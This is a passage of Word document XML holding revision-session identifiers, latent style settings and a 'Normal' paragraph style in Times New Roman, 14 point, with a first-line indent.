    <w:rsid w:val="001B497F"/>
    <w:rsid w:val="001B5ABA"/>
    <w:rsid w:val="001B764C"/>
    <w:rsid w:val="001C0CFB"/>
    <w:rsid w:val="001C3131"/>
    <w:rsid w:val="001C52E6"/>
    <w:rsid w:val="001D0951"/>
    <w:rsid w:val="001D0C9A"/>
    <w:rsid w:val="001D2B69"/>
    <w:rsid w:val="001D75F4"/>
    <w:rsid w:val="001E125A"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="001F0AAB"/>
    <w:rsid w:val="001F2273"/>
    <w:rsid w:val="001F5137"/>
    <w:rsid w:val="001F6121"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00201B2F"/>
    <w:rsid w:val="002052D4"/>
    <w:rsid w:val="00211F1E"/>
    <w:rsid w:val="00214971"/>
    <w:rsid w:val="00217862"/>
    <w:rsid w:val="00220295"/>
    <w:rsid w:val="0022075E"/>
    <w:rsid w:val="00220BAD"/>
    <w:rsid w:val="002212A3"/>
    <w:rsid w:val="0022399F"/>
    <w:rsid w:val="00235DF6"/>
    <w:rsid w:val="002361F2"/>
    <w:rsid w:val="00246363"/>
    <w:rsid w:val="0024651B"/>
    <w:rsid w:val="00246D3D"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00254107"/>
    <w:rsid w:val="002549CE"/>
    <w:rsid w:val="0026611D"/>
    <w:rsid w:val="002716E2"/>
    <w:rsid w:val="002802F5"/>
    <w:rsid w:val="002839BB"/>
    <w:rsid w:val="0028613A"/>
    <w:rsid w:val="00286FF3"/>
    <w:rsid w:val="00287215"/>
    <w:rsid w:val="0029301A"/>
    <w:rsid w:val="00294A9F"/>
    <w:rsid w:val="00296810"/>
    <w:rsid w:val="00296A4E"/>
    <w:rsid w:val="002A4301"/>
    <w:rsid w:val="002A7C5A"/>
    <w:rsid w:val="002B295D"/>
    <w:rsid w:val="002B2A4B"/>
    <w:rsid w:val="002B3FB0"/>
    <w:rsid w:val="002B56C4"/>
    <w:rsid w:val="002B6B53"/>
    <w:rsid w:val="002B6DD1"/>
    <w:rsid w:val="002B7772"/>
    <w:rsid w:val="002C16E8"/>
    <w:rsid w:val="002C3BD5"/>
    <w:rsid w:val="002C571E"/>
    <w:rsid w:val="002D0AF6"/>
    <w:rsid w:val="002D0B10"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002D772E"/>
    <w:rsid w:val="002E1B2A"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E7BD5"/>
    <w:rsid w:val="003009A6"/>
    <w:rsid w:val="0030131F"/>
    <w:rsid w:val="00311E86"/>
    <w:rsid w:val="00312221"/>
    <w:rsid w:val="00312341"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="003170D1"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00326AC2"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="003311E0"/>
    <w:rsid w:val="00332BB0"/>
    <w:rsid w:val="00332D4B"/>
    <w:rsid w:val="00334985"/>
    <w:rsid w:val="0034084D"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="003421B9"/>
    <w:rsid w:val="00343590"/>
    <w:rsid w:val="0034375B"/>
    <w:rsid w:val="00343F9B"/>
    <w:rsid w:val="00344D34"/>
    <w:rsid w:val="00350860"/>
    <w:rsid w:val="00350995"/>
    <w:rsid w:val="003512AA"/>
    <w:rsid w:val="003634EE"/>
    <w:rsid w:val="003652D4"/>
    <w:rsid w:val="0036593B"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="003741FC"/>
    <w:rsid w:val="003751D7"/>
    <w:rsid w:val="00381DC3"/>
    <w:rsid w:val="00383D6D"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00385401"/>
    <w:rsid w:val="0039119E"/>
    <w:rsid w:val="00391F9D"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="00396633"/>
    <w:rsid w:val="003A1778"/>
    <w:rsid w:val="003A5493"/>
    <w:rsid w:val="003A6090"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003B7C37"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003C374F"/>
    <w:rsid w:val="003C4D58"/>
    <w:rsid w:val="003C6237"/>
    <w:rsid w:val="003D0D1A"/>
    <w:rsid w:val="003D1256"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003E54A6"/>
    <w:rsid w:val="003E6EB4"/>
    <w:rsid w:val="003F1275"/>
    <w:rsid w:val="003F1F44"/>
    <w:rsid w:val="003F367F"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="0041359F"/>
    <w:rsid w:val="00414CC1"/>
    <w:rsid w:val="00415341"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="0041676E"/>
    <w:rsid w:val="004201D3"/>
    <w:rsid w:val="00430F1D"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00436F5C"/>
    <w:rsid w:val="004514F6"/>
    <w:rsid w:val="004541B0"/>
    <w:rsid w:val="00456E0A"/>
    <w:rsid w:val="00460D5E"/>
    <w:rsid w:val="0046123C"/>
    <w:rsid w:val="00461C81"/>
    <w:rsid w:val="00471832"/>
    <w:rsid w:val="00472521"/>
    <w:rsid w:val="0047278B"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="004767B2"/>
    <w:rsid w:val="00487D64"/>
    <w:rsid w:val="0049291A"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A27C2"/>
    <w:rsid w:val="004A2AEB"/>
    <w:rsid w:val="004A7A57"/>
    <w:rsid w:val="004A7C21"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C59C5"/>
    <w:rsid w:val="004C66F8"/>
    <w:rsid w:val="004D335C"/>
    <w:rsid w:val="004D55A3"/>
    <w:rsid w:val="004D732C"/>
    <w:rsid w:val="004E062D"/>
    <w:rsid w:val="004E11F2"/>
    <w:rsid w:val="004E400C"/>
    <w:rsid w:val="004E7FC6"/>
    <w:rsid w:val="004F0F10"/>
    <w:rsid w:val="004F0FC4"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F6810"/>
    <w:rsid w:val="004F6BCD"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="005041F2"/>
    <w:rsid w:val="00511853"/>
    <w:rsid w:val="00515BDC"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00522AC7"/>
    <w:rsid w:val="0053371D"/>
    <w:rsid w:val="0053412B"/>
    <w:rsid w:val="0053770A"/>
    <w:rsid w:val="00537A99"/>
    <w:rsid w:val="0054042A"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="005474C4"/>
    <w:rsid w:val="00551D07"/>
    <w:rsid w:val="00555B17"/>
    <w:rsid w:val="00560759"/>
    <w:rsid w:val="00563A46"/>
    <w:rsid w:val="00566201"/>
    <w:rsid w:val="00566AA9"/>
    <w:rsid w:val="00571B8B"/>
    <w:rsid w:val="005747E2"/>
    <w:rsid w:val="00575B81"/>
    <w:rsid w:val="005836F4"/>
    <w:rsid w:val="00583EAE"/>
    <w:rsid w:val="00590960"/>
    <w:rsid w:val="00591192"/>
    <w:rsid w:val="00595893"/>
    <w:rsid w:val="005961B5"/>
    <w:rsid w:val="005A4069"/>
    <w:rsid w:val="005A5E62"/>
    <w:rsid w:val="005A674E"/>
    <w:rsid w:val="005B0FC5"/>
    <w:rsid w:val="005B3CC4"/>
    <w:rsid w:val="005B5124"/>
    <w:rsid w:val="005C6944"/>
    <w:rsid w:val="005D14E0"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D4AFE"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005E59C7"/>
    <w:rsid w:val="005F0474"/>
    <w:rsid w:val="005F5048"/>
    <w:rsid w:val="005F6BFC"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="006026B1"/>
    <w:rsid w:val="00607EBB"/>
    <w:rsid w:val="00610DD8"/>
    <w:rsid w:val="0061206A"/>
    <w:rsid w:val="006278DB"/>
    <w:rsid w:val="006313B6"/>
    <w:rsid w:val="00632029"/>
    <w:rsid w:val="00642CBD"/>
    <w:rsid w:val="006443A6"/>
    <w:rsid w:val="006479BC"/>
    <w:rsid w:val="00650B72"/>
    <w:rsid w:val="00660481"/>
    <w:rsid w:val="00661351"/>
    <w:rsid w:val="00662D9E"/>
    <w:rsid w:val="00663210"/>
    <w:rsid w:val="00665EF6"/>
    <w:rsid w:val="00666743"/>
    <w:rsid w:val="00667243"/>
    <w:rsid w:val="00673416"/>
    <w:rsid w:val="00674088"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="00675401"/>
    <w:rsid w:val="006774D8"/>
    <w:rsid w:val="00683145"/>
    <w:rsid w:val="00694023"/>
    <w:rsid w:val="006958D0"/>
    <w:rsid w:val="00696013"/>
    <w:rsid w:val="00696CA7"/>
    <w:rsid w:val="006A0434"/>
    <w:rsid w:val="006B0029"/>
    <w:rsid w:val="006B24B7"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006B690C"/>
    <w:rsid w:val="006B7AC9"/>
    <w:rsid w:val="006C1EE0"/>
    <w:rsid w:val="006C3A75"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D03A1"/>
    <w:rsid w:val="006D75F5"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F40AC"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="006F6CC7"/>
    <w:rsid w:val="00700EF1"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="00706A7F"/>
    <w:rsid w:val="0071002F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="00714D60"/>
    <w:rsid w:val="0071777F"/>
    <w:rsid w:val="00723821"/>
    <w:rsid w:val="0072390A"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="0072563E"/>
    <w:rsid w:val="007265A7"/>
    <w:rsid w:val="00735384"/>
    <w:rsid w:val="007425FA"/>
    <w:rsid w:val="00744FF5"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="0075529D"/>
    <w:rsid w:val="00756074"/>
    <w:rsid w:val="007566F9"/>
    <w:rsid w:val="007600BF"/>
    <w:rsid w:val="007633C6"/>
    <w:rsid w:val="00767062"/>
    <w:rsid w:val="00771566"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="00776930"/>
    <w:rsid w:val="00783AE2"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00785FFB"/>
    <w:rsid w:val="007933D5"/>
    <w:rsid w:val="007954D1"/>
    <w:rsid w:val="007A1185"/>
    <w:rsid w:val="007A56EE"/>
    <w:rsid w:val="007A5DB4"/>
    <w:rsid w:val="007A6B60"/>
    <w:rsid w:val="007B36DE"/>
    <w:rsid w:val="007B45AA"/>
    <w:rsid w:val="007B7374"/>
    <w:rsid w:val="007C1563"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007C4AA0"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D1223"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D412B"/>
    <w:rsid w:val="007E08F9"/>
    <w:rsid w:val="007E5C19"/>
    <w:rsid w:val="007E6C18"/>
    <w:rsid w:val="007F1D49"/>
    <w:rsid w:val="007F1E36"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="008219C3"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="0082663B"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830EBC"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008344E3"/>
    <w:rsid w:val="00835FC9"/>
    <w:rsid w:val="008366A7"/>
    <w:rsid w:val="00836DA6"/>
    <w:rsid w:val="00840A37"/>
    <w:rsid w:val="00842D89"/>
    <w:rsid w:val="0084379D"/>
    <w:rsid w:val="00851525"/>
    <w:rsid w:val="00851A9C"/>
    <w:rsid w:val="008527B9"/>
    <w:rsid w:val="008529BB"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="008548C8"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="008636D4"/>
    <w:rsid w:val="00865DB0"/>
    <w:rsid w:val="00880E25"/>
    <w:rsid w:val="00881B20"/>
    <w:rsid w:val="0088467D"/>
    <w:rsid w:val="00887A95"/>
    <w:rsid w:val="00892109"/>
    <w:rsid w:val="008A44D6"/>
    <w:rsid w:val="008B1F14"/>
    <w:rsid w:val="008B5FB0"/>
    <w:rsid w:val="008C0DBE"/>
    <w:rsid w:val="008C5232"/>
    <w:rsid w:val="008D0035"/>
    <w:rsid w:val="008D3929"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E402C"/>
    <w:rsid w:val="008E5E75"/>
    <w:rsid w:val="008E6324"/>
    <w:rsid w:val="008E673B"/>
    <w:rsid w:val="008F720C"/>
    <w:rsid w:val="00901D0C"/>
    <w:rsid w:val="009029E1"/>
    <w:rsid w:val="00905FEA"/>
    <w:rsid w:val="00916F0A"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="009204CD"/>
    <w:rsid w:val="0092057A"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="0092436F"/>
    <w:rsid w:val="009312C0"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="0093523E"/>
    <w:rsid w:val="00935990"/>
    <w:rsid w:val="00937369"/>
    <w:rsid w:val="0094015A"/>
    <w:rsid w:val="0094478D"/>
    <w:rsid w:val="00947708"/>
    <w:rsid w:val="009508F2"/>
    <w:rsid w:val="00957C7A"/>
    <w:rsid w:val="00957E5B"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00964E9C"/>
    <w:rsid w:val="00965F2D"/>
    <w:rsid w:val="00971F7E"/>
    <w:rsid w:val="0097406B"/>
    <w:rsid w:val="00976008"/>
    <w:rsid w:val="0098000D"/>
    <w:rsid w:val="009807E3"/>
    <w:rsid w:val="00981BE1"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="009847BC"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009853E1"/>
    <w:rsid w:val="00991F95"/>
    <w:rsid w:val="00993DF2"/>
    <w:rsid w:val="00993F42"/>
    <w:rsid w:val="00994449"/>
    <w:rsid w:val="00996036"/>
    <w:rsid w:val="009A297F"/>
    <w:rsid w:val="009A601E"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009B4379"/>
    <w:rsid w:val="009B60C3"/>
    <w:rsid w:val="009B61D6"/>
    <w:rsid w:val="009B7DB0"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C191F"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009D5B94"/>
    <w:rsid w:val="009E2147"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A00DCF"/>
    <w:rsid w:val="00A0287C"/>
    <w:rsid w:val="00A10EA5"/>
    <w:rsid w:val="00A119E5"/>
    <w:rsid w:val="00A17FC6"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A337FC"/>
    <w:rsid w:val="00A33C0B"/>
    <w:rsid w:val="00A359A5"/>
    <w:rsid w:val="00A3769D"/>
    <w:rsid w:val="00A44F4E"/>
    <w:rsid w:val="00A5085A"/>
    <w:rsid w:val="00A53C23"/>
    <w:rsid w:val="00A56875"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A672CA"/>
    <w:rsid w:val="00A725C0"/>
    <w:rsid w:val="00A72E93"/>
    <w:rsid w:val="00A7396F"/>
    <w:rsid w:val="00A75E0C"/>
    <w:rsid w:val="00A814C5"/>
    <w:rsid w:val="00A830BB"/>
    <w:rsid w:val="00A92823"/>
    <w:rsid w:val="00A95C79"/>
    <w:rsid w:val="00AA09DF"/>
    <w:rsid w:val="00AA4FEA"/>
    <w:rsid w:val="00AB45B8"/>
    <w:rsid w:val="00AC1D93"/>
    <w:rsid w:val="00AC4C18"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD38B4"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00AE5967"/>
    <w:rsid w:val="00AE75AB"/>
    <w:rsid w:val="00AE7FDE"/>
    <w:rsid w:val="00AF0F61"/>
    <w:rsid w:val="00AF345A"/>
    <w:rsid w:val="00AF7614"/>
    <w:rsid w:val="00B04803"/>
    <w:rsid w:val="00B10DC6"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B14963"/>
    <w:rsid w:val="00B152D8"/>
    <w:rsid w:val="00B1543D"/>
    <w:rsid w:val="00B173C2"/>
    <w:rsid w:val="00B17E6C"/>
    <w:rsid w:val="00B23268"/>
    <w:rsid w:val="00B34853"/>
    <w:rsid w:val="00B43A3F"/>
    <w:rsid w:val="00B45966"/>
    <w:rsid w:val="00B50A5B"/>
    <w:rsid w:val="00B57594"/>
    <w:rsid w:val="00B63EF6"/>
    <w:rsid w:val="00B67640"/>
    <w:rsid w:val="00B71BBB"/>
    <w:rsid w:val="00B760D3"/>
    <w:rsid w:val="00B84933"/>
    <w:rsid w:val="00B850DF"/>
    <w:rsid w:val="00B868A6"/>
    <w:rsid w:val="00B906D6"/>
    <w:rsid w:val="00B90BFD"/>
    <w:rsid w:val="00B91728"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BA2724"/>
    <w:rsid w:val="00BA66FB"/>
    <w:rsid w:val="00BA75F5"/>
    <w:rsid w:val="00BB30F7"/>
    <w:rsid w:val="00BC2647"/>
    <w:rsid w:val="00BC6990"/>
    <w:rsid w:val="00BC6B3C"/>
    <w:rsid w:val="00BC70CF"/>
    <w:rsid w:val="00BD295F"/>
    <w:rsid w:val="00BD34E9"/>
    <w:rsid w:val="00BD42AD"/>
    <w:rsid w:val="00BD5A65"/>
    <w:rsid w:val="00BD665F"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BE556B"/>
    <w:rsid w:val="00BE71E0"/>
    <w:rsid w:val="00BF2B8F"/>
    <w:rsid w:val="00BF4F0B"/>
    <w:rsid w:val="00C021B7"/>
    <w:rsid w:val="00C06E78"/>
    <w:rsid w:val="00C12424"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C20EDE"/>
    <w:rsid w:val="00C213F3"/>
    <w:rsid w:val="00C218F6"/>
    <w:rsid w:val="00C22F21"/>
    <w:rsid w:val="00C23087"/>
    <w:rsid w:val="00C2718A"/>
    <w:rsid w:val="00C3504B"/>
    <w:rsid w:val="00C36C17"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C42DBD"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C475C6"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C51F63"/>
    <w:rsid w:val="00C5350D"/>
    <w:rsid w:val="00C53753"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C7328B"/>
    <w:rsid w:val="00C74E90"/>
    <w:rsid w:val="00C753F4"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C839CA"/>
    <w:rsid w:val="00C840CE"/>
    <w:rsid w:val="00C8433D"/>
    <w:rsid w:val="00C849CE"/>
    <w:rsid w:val="00C85FCE"/>
    <w:rsid w:val="00C87FD8"/>
    <w:rsid w:val="00C9118B"/>
    <w:rsid w:val="00C93737"/>
    <w:rsid w:val="00C95AEA"/>
    <w:rsid w:val="00C960F5"/>
    <w:rsid w:val="00C96689"/>
    <w:rsid w:val="00CB0717"/>
    <w:rsid w:val="00CB326B"/>
    <w:rsid w:val="00CB48A0"/>
    <w:rsid w:val="00CB6E7A"/>
    <w:rsid w:val="00CC3752"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00CD7EDD"/>
    <w:rsid w:val="00CE0D33"/>
    <w:rsid w:val="00CE35E1"/>
    <w:rsid w:val="00CE3DC8"/>
    <w:rsid w:val="00CE67BD"/>
    <w:rsid w:val="00CF5DF7"/>
    <w:rsid w:val="00D0340C"/>
    <w:rsid w:val="00D07937"/>
    <w:rsid w:val="00D101B8"/>
    <w:rsid w:val="00D12AEE"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D14879"/>
    <w:rsid w:val="00D16F6E"/>
    <w:rsid w:val="00D174AE"/>
    <w:rsid w:val="00D204A5"/>
    <w:rsid w:val="00D2320D"/>
    <w:rsid w:val="00D23BB4"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D24F70"/>
    <w:rsid w:val="00D2545F"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D324EF"/>
    <w:rsid w:val="00D34695"/>
    <w:rsid w:val="00D407AC"/>
    <w:rsid w:val="00D414AD"/>
    <w:rsid w:val="00D41BDD"/>
    <w:rsid w:val="00D4259F"/>
    <w:rsid w:val="00D46C2F"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D52AD5"/>
    <w:rsid w:val="00D558C7"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D61891"/>
    <w:rsid w:val="00D66D85"/>
    <w:rsid w:val="00D7154C"/>
    <w:rsid w:val="00D74977"/>
    <w:rsid w:val="00D75146"/>
    <w:rsid w:val="00D80ED7"/>
    <w:rsid w:val="00D86802"/>
    <w:rsid w:val="00D90B89"/>
    <w:rsid w:val="00D9740A"/>
    <w:rsid w:val="00DA6052"/>
    <w:rsid w:val="00DA7943"/>
    <w:rsid w:val="00DA7DC4"/>
    <w:rsid w:val="00DB6245"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DB6B4D"/>
    <w:rsid w:val="00DC0F45"/>
    <w:rsid w:val="00DE0135"/>
    <w:rsid w:val="00DE5294"/>
    <w:rsid w:val="00DF2B3A"/>
    <w:rsid w:val="00DF2C96"/>
    <w:rsid w:val="00E01769"/>
    <w:rsid w:val="00E04814"/>
    <w:rsid w:val="00E07D5E"/>
    <w:rsid w:val="00E12F3E"/>
    <w:rsid w:val="00E15669"/>
    <w:rsid w:val="00E15B9D"/>
    <w:rsid w:val="00E2012F"/>
    <w:rsid w:val="00E27E39"/>
    <w:rsid w:val="00E305BD"/>
    <w:rsid w:val="00E3146D"/>
    <w:rsid w:val="00E32523"/>
    <w:rsid w:val="00E32C3C"/>
    <w:rsid w:val="00E33C6C"/>
    <w:rsid w:val="00E354E8"/>
    <w:rsid w:val="00E36B81"/>
    <w:rsid w:val="00E36F9C"/>
    <w:rsid w:val="00E37207"/>
    <w:rsid w:val="00E377BB"/>
    <w:rsid w:val="00E41021"/>
    <w:rsid w:val="00E45416"/>
    <w:rsid w:val="00E4666E"/>
    <w:rsid w:val="00E47F75"/>
    <w:rsid w:val="00E50731"/>
    <w:rsid w:val="00E530C3"/>
    <w:rsid w:val="00E53690"/>
    <w:rsid w:val="00E576C6"/>
    <w:rsid w:val="00E62FBF"/>
    <w:rsid w:val="00E63B8E"/>
    <w:rsid w:val="00E64319"/>
    <w:rsid w:val="00E643CF"/>
    <w:rsid w:val="00E657B2"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E7154F"/>
    <w:rsid w:val="00E7176F"/>
    <w:rsid w:val="00E74201"/>
    <w:rsid w:val="00E74C87"/>
    <w:rsid w:val="00E77E79"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80310"/>
    <w:rsid w:val="00E80AE1"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00E853BA"/>
    <w:rsid w:val="00E865C1"/>
    <w:rsid w:val="00E908C2"/>
    <w:rsid w:val="00E90A75"/>
    <w:rsid w:val="00E917F4"/>
    <w:rsid w:val="00EA3168"/>
    <w:rsid w:val="00EA4D3F"/>
    <w:rsid w:val="00EA7F33"/>
    <w:rsid w:val="00EB182E"/>
    <w:rsid w:val="00EB26D5"/>
    <w:rsid w:val="00EB5249"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC5DF3"/>
    <w:rsid w:val="00EC7974"/>
    <w:rsid w:val="00ED34D4"/>
    <w:rsid w:val="00ED4A4A"/>
    <w:rsid w:val="00ED5472"/>
    <w:rsid w:val="00EE2E85"/>
    <w:rsid w:val="00EE3608"/>
    <w:rsid w:val="00EE3C72"/>
    <w:rsid w:val="00EF125B"/>
    <w:rsid w:val="00EF145F"/>
    <w:rsid w:val="00EF3331"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00EF747D"/>
    <w:rsid w:val="00F00A34"/>
    <w:rsid w:val="00F01100"/>
    <w:rsid w:val="00F01647"/>
    <w:rsid w:val="00F033BD"/>
    <w:rsid w:val="00F035E7"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F10F68"/>
    <w:rsid w:val="00F16050"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F216B8"/>
    <w:rsid w:val="00F343D2"/>
    <w:rsid w:val="00F35FE3"/>
    <w:rsid w:val="00F360BA"/>
    <w:rsid w:val="00F40350"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F57CBB"/>
    <w:rsid w:val="00F6150C"/>
    <w:rsid w:val="00F61A49"/>
    <w:rsid w:val="00F62622"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F758D8"/>
    <w:rsid w:val="00F81EAF"/>
    <w:rsid w:val="00F8357D"/>
    <w:rsid w:val="00F84C9B"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00F92B30"/>
    <w:rsid w:val="00F95474"/>
    <w:rsid w:val="00F9595B"/>
    <w:rsid w:val="00FA31B8"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FA57CE"/>
    <w:rsid w:val="00FB154D"/>
    <w:rsid w:val="00FB1E44"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FC2E7C"/>
    <w:rsid w:val="00FC373C"/>
    <w:rsid w:val="00FC4632"/>
    <w:rsid w:val="00FC515E"/>
    <w:rsid w:val="00FD037F"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE1366"/>
    <w:rsid w:val="00FE2979"/>
    <w:rsid w:val="00FE5A79"/>
    <w:rsid w:val="00FE7FAB"/>
    <w:rsid w:val="00FF0ECB"/>
    <w:rsid w:val="00FF137D"/>
    <w:rsid w:val="00FF37DF"/>
    <w:rsid w:val="00FF6364"/>
    <w:rsid w:val="00FF68A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BF2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jc w:val="both"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:latentStyles w:defLockedState="1" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
    <w:lsdException w:name="Normal" w:locked="0" w:uiPriority="0" w:qFormat="1"/>
    <w:lsdException w:name="heading 1" w:locked="0" w:uiPriority="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 2" w:locked="0" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 3" w:locked="0" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 4" w:locked="0" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 5" w:locked="0" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 6" w:locked="0" w:semiHidden="1" w:uiPriority="5" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 7" w:locked="0" w:semiHidden="1" w:uiPriority="5" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 8" w:locked="0" w:semiHidden="1" w:uiPriority="5" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 9" w:locked="0"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0"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locked="0"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uiPriority="21"/>
    <w:lsdException w:name="Subtle Reference" w:locked="0" w:uiPriority="31"/>
    <w:lsdException w:name="Intense Reference" w:locked="0" w:uiPriority="32"/>
    <w:lsdException w:name="Book Title" w:locked="0"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a4">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00E47F75"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
